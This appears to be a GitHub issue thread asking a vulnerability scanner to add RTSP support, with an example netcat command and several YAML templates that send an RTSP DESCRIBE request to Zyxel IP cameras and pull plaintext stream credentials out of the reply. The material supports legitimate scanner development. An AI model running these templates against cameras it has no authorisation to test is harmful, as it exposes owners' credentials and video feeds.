Request to add RTSP

[gy741]

Hello,

An attempt was made to trigger an unauthorized RTSP access vulnerability.

But it doesn't seem to work.

The tester uses netcat as below to trigger the vulnerability.

netcat version:

echo -e 'DESCRIBE rtsp://10.233.21.7:554/medias1 RTSP/1.0\r\nCSeq: 2\r\n\r\n'  | nc 127.0.0.1 80

Ref:

• https://book.hacktricks.xyz/network-services-pentesting/554-8554-pentesting-rtsp
• http://www.hydrogen18.com/blog/hacking-zyxel-ip-cameras-pt-1.html

Below is the template I tested.

id: zyxel-ip-camera-credentials-disclosure

info:
  name: Zyxel IP Camera - RTSP Credentials Disclosure
  author: gy741
  severity: critical
  description: |
    The Zyxel IP Cameras allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
  reference:
    - http://www.hydrogen18.com/blog/hacking-zyxel-ip-cameras-pt-1.html
  tags: zyxel,exposure,camera,iot

requests:
  - raw:
      - |+
        DESCRIBE rtsp://{{Hostname}}/medias1 RTSP/1.0
        CSeq

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "a=tool:"
          - "a=type:"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/medias1\/'

id: zyxel-ip-camera-credentials-disclosure

info:
  name: Zyxel IP Camera - RTSP Credentials Disclosure
  author: gy741
  severity: critical
  description: |
    The Zyxel IP Cameras allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
  reference:
    - http://www.hydrogen18.com/blog/hacking-zyxel-ip-cameras-pt-1.html
  tags: zyxel,exposure,camera,iot

network:
  - inputs:
      - data: "DESCRIBE rtsp://10.233.21.7:554/medias1 RTSP/1.0 \r\nCSeq: 2\r\n\r\n"
    host:
      - "{{Host}}:554"
      - "{{Hostname}}"

    matchers:
      - type: word
        part: body
        words:
          - "a=tool:"
          - "a=type:"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/medias1\/'

Thanks.

[niudaii]

It can be modified as follows,

id: zyxel-ip-camera-credentials-disclosure

info:
  name: Zyxel IP Camera - RTSP Credentials Disclosure
  author: gy741
  severity: critical
  description: |
    The Zyxel IP Cameras allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
  reference:
    - http://www.hydrogen18.com/blog/hacking-zyxel-ip-cameras-pt-1.html
  tags: zyxel,exposure,camera,iot

tcp:
  - inputs:
      - data: "DESCRIBE rtsp://{{Host}}:554/medias1 RTSP/1.0\r\nCSeq: 2\r\n\r\n"
    host:
      - "{{Host}}:554"

    read-size: 1024

    matchers:
      - type: word
        part: body
        words:
          - "a=tool:"
          - "a=type:"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/medias1\/'

wireshark packet capture results